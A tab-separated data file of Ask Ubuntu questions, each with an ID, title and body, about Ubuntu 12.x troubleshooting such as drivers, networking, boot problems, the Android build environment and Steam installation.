256445	virtual machine : ubuntu as host and windows 98 as guest does not work	i am trying to setup a virtual machine in ubuntu 12.10 my host system ( i dualboot on win7 ... ) . after many efforts i succeeded to setup wm player 5 and even vm worstation wineprefix= '' /home/caron/.wine '' wine c : \\program\ files\ \ ( x86\ ) \\vmware\\vmware\ workstation\\vmware.exe but when i want to create a virtual machine in vm player , i am able to set up all parameters and when i launch nothing happens . what can be wrong ?
256451	how to enable bluetooth using lenovo 480g	this has been mentioned before for different lenovo models ( here : how do i enable bluetooth on my lenovo ideapad z580 ? ) . the toggle switch shows off , switching it on does nothing , different bt dameons do not work either . there was a suggestion to upgrade the kernel to 3.7* ( i am running 3.6* now ) , but when i did this , i could not figure out how to get wired network driver support . my mistake for getting a lenovo , looks good , but the linux support seems to be lacking . rfkill list 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no any suggestions how to get the bluetooth enabled ? kernel messages : dmesg | grep -i bluetooth [ 26.701536 ] bluetooth : core ver 2.16 [ 26.701554 ] bluetooth : hci device and connection manager initialized [ 26.701556 ] bluetooth : hci socket layer initialized [ 26.701557 ] bluetooth : l2cap socket layer initialized [ 26.701560 ] bluetooth : sco socket layer initialized [ 26.719851 ] bluetooth : rfcomm tty layer initialized [ 26.719855 ] bluetooth : rfcomm socket layer initialized [ 26.719856 ] bluetooth : rfcomm ver 1.11 [ 26.800299 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 26.800301 ] bluetooth : bnep filters : protocol multicast lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 1a40:0201 terminus technology inc. fe 2.1 7-port hub bus 001 device 004 : id 0bda:0129 realtek semiconductor corp . bus 002 device 003 : id 5986:0294 acer , inc bus 001 device 005 : id 04b4:0033 cypress semiconductor corp . mouse bus 001 device 006 : id 04d9:1503 holtek semiconductor , inc. shortboard lefty
256459	need help aligning conky objects	i 've been using conky a long time , and one thing i just ca n't seem to get looking nice is the network graph . the graphs start on the right hand side , and scroll to the left . i want the starting point for the graphs to match up . you can see that the down graph starts a little more to the right than the up graph . they are the same legnth they just do n't line up . can anyone help me accomplish this ? i 've tried a few ways like making `` down '' and `` up '' alignl , then having the graphs alignc , then the kb info alignr but that did n't work . here 's my current network config , paired with a screenshot : $ { font arial : bold : size=10 } $ { color # 342826 } network $ { color # 747170 } $ { hr 2 } $ font $ { color # e8e8e8 } ip on eth1 $ { alignr } $ { addr eth1 } down $ { downspeedgraph eth1 12,120 000000 } $ alignr $ { downspeed eth1 } up $ { upspeedgraph eth1 12,120 000000 } $ alignr $ { upspeed eth1 } downloaded : $ alignr $ { totaldown eth1 } uploaded : $ alignr $ { totalup eth1 }
256460	updating ubuntu destroys unity	i came back from vacations and installed the updates available for ubuntu 12.10 as i always do . the system asked me to reboot and when i did it started again but in the screen some artifacts appeared ( which may mean it 's a vga driver problem ) . when the desktop showed up , the resolution was smaller and the unity launcher and the systray had disapeared . all i could do was to open the terminal with alt+ctrl+t . the buttons to close and minimize in the terminal windows had disapeared as well . to fix the problem i reinstalled ubuntu 12.10 by formatting the pc but when i installed the updates again the same thing happened which means that i ca n't do it again because the result will be the same . anyone knows what to do ? thanks !
256464	ubuntu 12.04 lts ati hd 3600	how can i install my graphics card ati hd 3600 on ubuntu 12.04 lts ? please help me .
256465	linking images from higher directory from multisite environment	linking structure for higher file locations this is a linking question for image linking . i have apache2 setup for named-based virtual hosts with the base root set as /var/www/ . the layout is as follows : /var/www/site 1 /var/www/site 2 /var/www/common/ /var/www/pictures/ /var/www/music/ /var/www/etc/ ... document roots point to each sites ' sub-folder ( i.e . www.site1.net points to /var/www/site1 as root ) . i can access both sites correctly from outside the local network . links inside the site works as it seems to point to the reference root in document root . the issue lies in pointing back ground images or any other files located in /var/www/any/file.file from the site1 and site2 document root . what i have tried : [ img style= '' width : 200px ; height : 300px ; '' alt= '' test image '' src= '' ../pictures/scroll-background-invitatio.jpg '' > ] [ img style= '' width : 200px ; height : 300px ; '' alt= '' test image '' src= '' ../../pictures/scroll-background-invitatio.jpg '' > ] [ img style= '' width : 200px ; height : 300px ; '' alt= '' test image '' src= '' http : //www/mysite1.net/pictures/scroll-background-invitatio.jpg '' > ] [ img style= '' width : 200px ; height : 300px ; '' alt= '' test image '' src= '' pictures/scroll-background-invitatio.jpg '' > ] basically , i have tried everything . i googled that seemed like it pertained to my situation but apparently my google-fu has gotten rusty . bear in mind that this is the beginning of my third week going from nothing to a linux box built and installed by myself ( ubuntu 12.04 ) , apache2-mysql-php5 , and setting up my host while having a dynamic ip , and programming in languages i have never touched ( i quit doing this in early 90 's and only ever touched html/dhtml ) . i am very new to this . i have asking questions when there is so much info out there but i am stuck and am not sure what syntax i should use even in googling for an answer . if i am missing information that is needed , you have questions in order answer mine , or i should be posting this question elsewhere , feel free to ask or let me know . many thanks in advance . edit : in my editor ( kompozer ) . when creating the site ../pictures/image.jpg , the file shows in preview properly .
256470	how to dual boot ubuntu 12 with windows 8 and use secure boot ?	i have asus g46vw notebook pre-installed with windows 8 and secure boot . i want to dual boot windows 8 with ubuntu 12 and use secure boot . in order to actually have the bios recognize the usb drives to boot from ( have to usb boot ) i have no choice but to disable secure boot and enable csm in the bios . then i can boot from the usb/sdcard . there are several places i could install a bootloader onto - there are lots of microsoft related partitions on the disc ! also , if i install ubuntu with secure boot disabled , and i activate it again , will ubuntu ( and windows 8 ) work ?
256471	ubuntu boots to black screen with multiboot on nexus 7	-i am using multirom -my internal rom is stock 4.2.1 -i also have pa 3.0 installed via multirom - using kernel w/ kexec-hardboot patch ( stock 4.2 ) when i install ubuntu it will go to the boot screen ( where it says 'ubuntu ' with the little loading squares flashing ) then it eventually just goes black and does n't respond . any ideas on this black screen of death ? let me know if you guys have any info , tried to google around but ca n't seem to find this specific problem specifically with the nexus 7 install ( and on multiboot setup )
256478	ca n't boot into ubuntu after installing	i just installed ubuntu at my hp pavillion h8 computer with 8gb ram and a intel core i7 cpu , and for some reason i ca n't boot into ubuntu . when looking in the msconfig boot menu , the only os listed is windows 7 . also i ca n't seem to find the `` os selection screen '' in my boot menu . when the hp logo appears , i press esc to interrupt normal boot , and i get this screen with a lot of options . i tried all of them , and none of them seems to have a `` os selection screen '' . i installed ubuntu 12.04.2 using a cd . thanks in advance . edit : i read this article , which said that ubuntu made itself the default os when installed . that 's not the case here . i ca n't even get into it . http : //www.psychocats.net/ubuntu/bootmenu edit2 : i 've just checked my remaining space in the c : drive in windows . and yes , the partition were successfull , i have less space for windows ( which means more space for ubuntu , i think ) . so from that i can conclude that my installation were n't cancelled .
256480	replace default audio control with pavucontrol	thanks to ask ubuntu , recently i discovered pulseaudio volume control ( pavucontrol ) and started using it with joy . my question is this : is there a way to use it in place of the default audio control shipped with ubuntu 12.04 ? i would like to get pavucontrol to appear by clicking on the speaker icon in the unity top bar .
256484	okular and external movie player compete for owning the screen ?	i have been using okular as my primary pdf viewer , and for pdf presentation . usually my pdf presentations contains link to external movie files , which , upon clicks , will be opened in an external movie player ( i use vlc ) . i notice that okular in presentation mode seem to compete with vlc for `` owing '' the screen , and as a result , the screen is flickering back and forth between okular and vlc . this only happened after some recent updates in ubuntu 12.04 , and only happened when i use the presentation mode . is there a solution to avoid this problem ? many thanks .
256486	how do i record a console session ?	i know how to get to the console on my computer by pressing ctrl alt f1 - f6 . when i run a screen recording program and switch to console and then switch back by pressing ctrl alt f7 , i save the video however the recording of the console did n't show up . is there a program that will let me do that . or a program that will simulate the console session in full screen so you do n't see the gui . i am using xvidcap and it does n't record the console .
256487	initialising the build environment for android on 64-bit 12.04	i am looking to initialise the build environment for the aosp codebase ( or for that matter , any android source ) , and one of the first steps in the process is to ; $ sudo apt-get install git gnupg flex bison gperf build-essential \ zip curl libc6-dev libncurses5-dev : i386 x11proto-core-dev \ libx11-dev : i386 libreadline6-dev : i386 libgl1-mesa-glx : i386 \ libgl1-mesa-dev g++-multilib mingw32 openjdk-6-jdk tofrodos \ python-markdown libxml2-utils xsltproc zlib1g-dev : i386 $ sudo ln -s /usr/lib/i386-linux-gnu/mesa/libgl.so.1 /usr/lib/i386-linux-gnu/libgl.so i have a ( newly installed ) ubuntu 12.04 64-bit machine and run into trouble with 32-bit dependencies in the past . i want to get this one right from the start . i have installed all the packages ( through synaptic or apt-get ) with the exception of ; libncurses5-dev : i386 libgl1-mesa-glx : i386 zlib1g-dev : i386 apt-get for these three alone returns ; danielgt @ danielgt-linux : ~ $ sudo apt-get install libncurses5-dev : i386 libgl1-mesa-glx : i386 zlib1g-dev : i386 reading package lists ... done building dependency tree reading state information ... done libgl1-mesa-glx : i386 is already the newest version . the following extra packages will be installed : libc6-dev : i386 linux-libc-dev : i386 suggested packages : glibc-doc : i386 manpages-dev : i386 ncurses-doc : i386 recommended packages : gcc : i386 c-compiler : i386 the following packages will be removed build-essential g++ g++-multilib gcc gcc-multilib libncurses5-dev the following new packages will be installed libc6-dev : i386 libncurses5-dev : i386 linux-libc-dev : i386 zlib1g-dev : i386 0 upgraded , 4 newly installed , 6 to remove and 0 not upgraded . need to get 6,349 kb of archives . after this operation , 23.2 mb of additional disk space will be used . do you want to continue [ y/n ] ? n abort . danielgt @ danielgt-linux : ~ $ it seems counter-intuitive for me to run the last command and ; remove the build-essential and g++-multilib packages indicated as required in the original command . remove a 64-bit package ( libcurses5-dev ) to replace it with the i386 variant , as a 64-bit system is required to build . additionally , i do n't seem to have libgl1-mesa-glx : i386 installed , though i do have the 64-bit variant ( libgl1-mesa-glx ) . is that explained by the second ( ln ) command ran ? any advice as to how i should proceed would be welcome ?
256489	can i install maas on the same server my nodes will be on ?	hello every geek and nerds out there . i 'm a network engineer but i 've been following ubuntu and the cloud architecture for quite a while now . question : i have a hp dl380 dual quad core with 16gb of ram and eight 73gb hdds . my intention is to install maas on this server and use the same server to host some os ( eg . linux , win ) by using some hard drives as server nodes for these oss . please could you shed more light on this . am i mis-understanding what maas does or how it should be installed . do i need a seperate server for maas ? please help . thanks .
256497	correct place to put colors of prompt ( ps1 )	say i want to change the colors of my ps1 , or for the sake of simplicity i just want to change the content , so i want to do this : ps1= '' touch me : `` my problem , doubt is : if i put this in .bash_profile , every time i open a terminal i need to source it . if i put it in .profile , the same , i need to explicitly source it . it seems nasty to put this in .bashrc directly where should i locate this kind of configurations ?
256498	ctrl-super-right does n't work in 12.10	noticed today that the default unity setting for keywords to partially maximize windows to left or right partially works in my laptop . my ubuntu is totally updated . any idea on how to fix that ?
256500	how do i switch back and uninstall ubuntu ?	i followed the instructions and downloaded the program , installed , restarted and i was brought to the linux startup page . i was then panicking , how the hell do i switch back to windows ? why ca n't i access the local drive i used to have ? i gave in and i do n't want ubuntu anymore . how do i switch back and uninstall ubuntu ? i 'm using a laptop . sorry if you have bad impressions on me because i only used ubuntu for a game .
256507	how can i know the screen resolution 's width within a script ?	my script needs to query the screen resolution 's width , for instance , on 1980x1050 the command must return 1980 . i want that script to maximize a window to the half ( as seen when dragging the window to either side of the screen ) . this way i can bind it to a key combination . so far the command goes like this : uid=`xprop -root | awk '/_net_active_window\ ( window\ ) / { print $ nf } '` xwit -resize $ width $ height -move $ width 0 -id $ uid but $ width and $ height are set manually and kind of does the work .
256508	how to change wallpaper and make transparent caps in compiz cube ?	how do i change the wallpaper and make them transparent for the top en bottom cap . i can not find the option in compiz setting mananger . there is only the option to set the collors , and the transparent option does not even work.. i am on ubuntu 12.10 x64
256512	why does the terminal only show the $ sign ?	i recently tried installing salome un my ubuntu 12.10 , using these instructions http : //code-saturne.blogspot.ro/2010/05/installation-of-salome-513-on-ubuntu.html and as soon as i installed ia32-libs things took a bad turn . the terminal crashed and now it only displays the $ sign , and whaterver command i type it does n't work . in addition , whenever ubuntu tries to update i get errors when trying to install packages . if there 's need for more information , i 'll try to provide it , although i 've only recently migrated to linux from windows . thank you very much !
256515	is there any ubuntu twitter app that handles scheduled tweets ?	i 'm looking for an app that can schedule tweets for future times , rather than only tweeting now , as gwibber does . i 'm looking for a native ubuntu app because : i 'd prefer using something that 's free software and web-apps such as hootsuite have a limit to how many profiles you can manage before having to pay for their service . thanks in advance . edited to add : i would like a twitter app that does the above and has a gui .
256517	trying to configure two ethernet adapters - failed to bring up eth1	gurus of the internet please help . i am trying to configure 2 network adapters , one for local traffic ( eth0 ) and the other for a t1 line to handle incoming requests to apache from the outside world . i am running 12.04 lts server . here is my /etc/network/interfaces ( i am using x to hide actual addresses ) # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface for local traffic auto eth0 iface eth0 inet static address 192.168.1.201 netmask 255.255.255.0 gateway 192.168.1.1 dns-nameservers 192.168.1.1 # second nic for t1 auto eth1 iface eth1 inet static address x.x.x.x netmask x.x.x.x gateway x.x.x.x dns-nameservers x.x.x.x x.x.x.x if i run ifconfig -a i get eth0 link encap : ethernet hwaddr 00:13:3b:0c:1b:12 inet addr:192.168.1.201 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :213:3bff : fe0c:1b12/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:13716 errors:0 dropped:146 overruns:0 frame:0 tx packets:1064 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1077933 ( 1.0 mb ) tx bytes:147855 ( 147.8 kb ) interrupt:46 base address:0x2000 eth1 link encap : ethernet hwaddr 00:16:76 : c2:81 : b9 inet addr : x.x.x.x bcast : x.x.x.x mask : x.x.x.x up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:20 memory:90400000-90420000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:450 errors:0 dropped:0 overruns:0 frame:0 tx packets:450 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:40004 ( 40.0 kb ) tx bytes:40004 ( 40.0 kb ) when i restart the network or reboot i get ssh start/running , process 2853 rtnetlink answers : file exists failed to bring up eth1 . please help !
256521	removing files with a certain extension except one file from terminal	i need to remove all files with .gif extension except one file with name say `` filename.gif '' . what is the optimal way to go about doing this in terminal ? the command rm *.gif removes all gif files including the file filename.gif .
256525	where can i find reliable review of ubuntu 's performance on a laptop ( lenovo z580 )	sorry to ask a hardware related question . hope it 's relevant enough to ubuntu users in general not to get instantly down-voted and marked as a replica as a related hardware question did . i hope it 's useful to others , as this hardware question was ! ( subtle difference : i 'm asking where do i find information , not what is the information ) . i know the main ports of call : ubuntu hardware support ( lenovo does n't even seem to be listed ) ubuntu certified ( lists v580 as being compatible : good sign , but not enough to overcome concerns about uefi ) google ( a load of scare stories about uefi problems , which i suspect are the minority , but struggling to find a similarly large stash of `` it works fine '' stories . these are general problems , so please think about the best generic steps that you would take when looking into a new lappy . and people less experienced with ubuntu compatible hardware purchases ( i 've bought a few and it 's still really hard - imagine what it 's like for someone completely new to the wonderful world of linux and computer hardware ) . thanks .
256526	why do i have poor performance with alienware m17x r1 and dual gtx260m ?	i am using ubuntu 12.10 with the nvidia drivers ( 310.14 ) , my performance in both team fortress 2 and counter strike source is sporadic . in some instances , i manage to get between 150 and 250 fps and other times , i can barely break 20fps . machine spec is as follows : intel® core™2 quad cpu q9000 @ 2.00ghz × 4 8gb ram onboard nvidia 9400 ( which i disabled in the bios ) dual gtx260m connected in sli here is the tail end of my xorg.conf file : section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` sli '' `` on '' subsection `` display '' depth 24 endsubsection endsection i am also having problems with hdmi output ( video and sound ) working with my tv . another note : changing any of the video settings in either game has no effect on the framerate at all .
256527	is the ubuntu logo an african symbol ?	i understand the logo is meant to represent the zulu philosophy of ubuntu , but is the logo an african symbol ? ?
256528	steam.sh is empty	i tried to install steam on my 64 bits pc , but when i tried to run it it did nothing . i then tried to run the program via terminal , and all i got was this message : /usr/bin/steam : line 192 : /home/pauix/.local/share/steam/steam.sh : success seeing that there was something wrong with the file `` steam.sh '' , i decided to check it , and it was completely empty ( which i guess it should n't be ) . is there any way to fix this problem ? thanks in advance .
256530	ui changed , ca n't change it back	the interface of many programs has changed to a `` classic '' look . chrome , firefox , and virtual box are three that i 've noticed so far . everything looks normal when i 'm using the file manager or ubuntu software center . here 's a screenshot :
256532	how to resize the width of nautilus sidebar ?	i am using ubuntu 12.10 . i am unable to see the bookmarks in nautilus , although right clicking on `` personal ordner '' ( german version ) opens a list of the bookmarks . the corrupted screen ( see the screenshot below ) shows the bookmarks in a sub-window only about 5 mm wide ! i have tried reinstalling nautilus with synaptic , without however any success . any ideas about how to resize the width of nautilus ' sidebar ?
256534	how do i find the path to pg_hba.conf from the shell ?	i would like to obtain the path to pg_hba.conf from the shell . the path varies between versions of postgresql . for instance , for 8.4 and 9.1 : /etc/postgresql/8.4/main/pg_hba.conf /etc/postgresql/9.1/main/pg_hba.conf i have tried the pg_config command , but it does not seem to include this information . this is so that i can use a uniform command for opening pg_hba.conf and other postgresql configuration files for editing . i 'm using bash .
256537	thinkpad 13 edge microphone noise problem	i 'm having problems with the microphone making a annoying noise that makes talking really hard . my laptop is a thinkpad edge 13 ( the version with an intel processor ) i reported a bug [ 1 ] and i got the following response : unsolicited event should not be enabled on internal mic which does not support jack detection misc = no_presence i reported the following log [ 2 ] the problem appears in both 12.04 and 12.10 . i want to know how to fix it . and if it is possible how i can help so that this error does n't happen in the future to anybody . [ 1 ] https : //bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/1113822 [ 2 ] http : //www.alsa-project.org/db/ ? f=caa4f278baae73257cec7816c72eedcbe977468e
256539	remote desktop resolution	i 'm connecting to a windows desktop through remote desktop viewer but their desktop is so small that it 's to difficult to work with it . is there way to increase the resolution ?
256540	can i run ubuntu os on a android 4.0 tablet ?	i have a cheap chinese made tablet from dubai called the crony dubai ( www.cronydubai.com ) . it has a micro b , mini hdmi and a usb labeled as `` host '' as well as a micro sd slot . it came with a micro b to usb adapter in box , and its running ice cream sandwich . is there a way to load ubuntu on it ? also the tablet is very buggy and crashes often , would that be due to the tablet or the os ?
256541	ubuntu 12.10 64bit not picking up my ethernet	i logged onto ubuntu to realize that my ethernet connection is not connected . it has worked fine until now . any help would be appreciated . also , i 'm using realtek ethernet .
256543	1,727 lines of `` rt2x00pci_regbusy_read : indirect register access failed '' with linksys wmp600n . why ?	update : as per http : //forums.fedoraforum.org/showpost.php ? p=1582395 & postcount=2 , i switched a tv tuner and the card around today ( i.e . put the wi-fi card where the hauppague wintv hvr-1600 was , and the tv tuner card where the wi-fi card was ) , and now it actually does see the card as the correct one . however , i 'm now getting the same problem as described here : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/588113 mind you , this is an archaic natty narwhal ( 11.04 ) bug report , with a 2.6.34 kernel . the version of ubuntu that i have is 12.10 quantal quetzal with a 3.5.0.23 kernel . so if there 's any sort of regressions involved , i think they may need more attention . here 's my dmesg | grep regbusy output to confirm the issue : [ 803.452388 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.518060 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.528087 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.538117 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.548140 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.558354 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.568376 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.578391 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.588416 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.598633 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.608657 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.618675 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.628698 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.638720 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.648748 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.658766 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.668792 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.678835 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.688862 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.698881 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.708907 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.718928 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.728954 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.746271 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.756324 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.766363 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.776447 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.786519 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.796549 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.806628 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.816668 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 803.882120 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.892161 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.902221 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.912245 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.922471 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.932523 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.942555 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.952625 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.962840 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.972874 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.982919 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 803.992949 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 804.003019 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.013049 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.023121 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.033152 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.043225 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.053253 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.063297 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.073325 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.083347 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.093371 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.110057 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.120125 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.130147 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.140213 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.150233 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.160262 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.170311 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.180332 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000101c , value=0xffffffff [ 804.246077 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 804.256130 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 804.266161 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 804.276220 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 804.286441 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 804.296468 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 804.306526 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 804.316548 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff [ 804.326823 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x00001020 , value=0xffffffff ... and so on , for a total of 1,727 duplicate lines of errors .
256545	how to zip contents recursively under the directory foo/* . * ?	zip -r /tmp/foo/bar.zip /tmp/foo/* > /dev/null 2 > & 1 and the achieve is in this structure /tmp /foo file1 file2 dir1/ file3 dir/2 file4 why is /tmp part of the structure ?
256548	how do i get rid of windows and having ubuntu as main os	i have used ubuntu exclusively now for the past year . i installed it with wubi . i now want to get rid of windows and have just ubuntu . cant this be done easily ?
256553	why can i no longer access wifi networks ?	i have been accessing wifi for 2 1/2 weeks all over mexico . suddenly , i can not connect . nothing has changed except my geographic location . ( unless i did something inadvertent on my over-sensitive keyboard-is that possible ? ) help !
256558	what version of ubuntu can i run on my old pc ?	i have an old pc specs : cpu:733 mhz ram:128 mb vga :32 mb i tried to run ubuntu 8.0 on it , but when the pc tries to log in to the ubuntu it stops and does n't do anything . i think that the ram becomes full . so what version of ubuntu should i run on my pc ? it needs support for java because i want to run a java program on it that only prints hello world on the screen .
256559	installing ubuntu 12.10 with virtualbox - > not enough storage	i 'm trying to install ubuntu 12.10 with virtualbox . i allowed 20gb of space for the virtual computer and when i tried to install it , it said that i do n't have enough space , which i have over 100gb . and i really do n't want to format my hard drive because that would screw up everything . how can i fix this ?
256560	installing steam	when i try to install steam 64bit i get this error : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : steam64 : depends : steam ( = 1.0.0.27ubuntu1 ) but it is a virtual package any idea on what to do ? i 've searched this website and tried most of the answers but none of it worked .
